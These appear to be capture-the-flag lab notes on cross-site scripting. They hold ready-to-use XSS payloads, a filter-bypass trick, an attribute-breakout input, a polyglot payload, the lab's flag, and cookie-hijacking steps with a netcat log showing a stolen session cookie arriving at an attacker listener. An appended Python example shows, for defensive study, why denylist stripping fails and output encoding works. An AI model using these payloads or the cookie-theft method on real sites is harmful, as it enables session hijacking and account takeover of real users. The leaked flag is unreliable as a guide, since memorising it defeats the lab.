XSS
https://github.com/mandatoryprogrammer/xsshunter-express
Basic payloads
<script>alert('THM');</script>
"><script>alert('THM');</script>
</textarea><script>alert('THM');</script>
';alert('THM');//
When the filter strips the script tag in a single, non-recursive pass:
<sscriptcript>alert('THM');</sscriptcript>
When < and > are filtered (attribute breakout instead of a new tag):
/images/cat.jpg" onload="alert('THM');"
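Added example from the defensive side (not part of these notes): why a single-pass "script" strip is defeated by the nested payload above, why repeating the strip only closes that one trick, and how contextual output encoding handles both the tag payload and the attribute-breakout payload. render_img is a hypothetical template standing in for the vulnerable page.

```python
import html
import re

# Constructed inputs: the two payloads from the notes above
BYPASS = "<sscriptcript>alert('THM');</sscriptcript>"
ATTR_PAYLOAD = '/images/cat.jpg" onload="alert(\'THM\');"'


def naive_filter(value: str) -> str:
    """Denylist filter of the kind the notes describe: one pass that deletes
    every literal 'script'. Deleting the inner match of 'sscriptcript'
    reassembles the very word that was just removed."""
    return re.sub(r"script", "", value, flags=re.IGNORECASE)


def recursive_strip(value: str) -> str:
    """Same denylist, repeated until nothing changes. Closes the nesting
    trick but still leaves every other tag and attribute untouched."""
    while True:
        stripped = re.sub(r"script", "", value, flags=re.IGNORECASE)
        if stripped == value:
            return value
        value = stripped


def encode_for_html(value: str) -> str:
    """Contextual output encoding: the browser receives text, never markup.
    quote=True also neutralises the quote that breaks out of an attribute."""
    return html.escape(value, quote=True)


def render_img(src: str, sanitizer) -> str:
    """Hypothetical template (assumption) that puts user input in a src attribute."""
    return f'<img src="{sanitizer(src)}">'


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to compare the three approaches."""
    return re.search(r"<\s*script\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, fn in [("naive", naive_filter), ("recursive", recursive_strip),
                     ("encode", encode_for_html)]:
        print(f"{name:9} tag payload  -> {fn(BYPASS)}")
        print(f"{name:9} attr payload -> {render_img(ATTR_PAYLOAD, fn)}")
```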
Flag.
THM{XSS_MASTER}
XSS polyglot.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
Cookie hijacking
1. Run an HTTP server or listener on the attacker machine.
2. Generate a payload.
3. Catch the cookie:
root@ip-10-10-117-154:~# nc -nlvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Connection from 10.10.222.139 34142 received!
GET /?cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ== HTTP/1.1
Host: 10.10.117.154:9001
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.72 Safari/537.36
Accept: */*
Origin: http://172.17.0.1
Referer: http://172.17.0.1/
Accept-Encoding: gzip, deflate
Accept-Language: en-US
4. Decode the base64 cookie.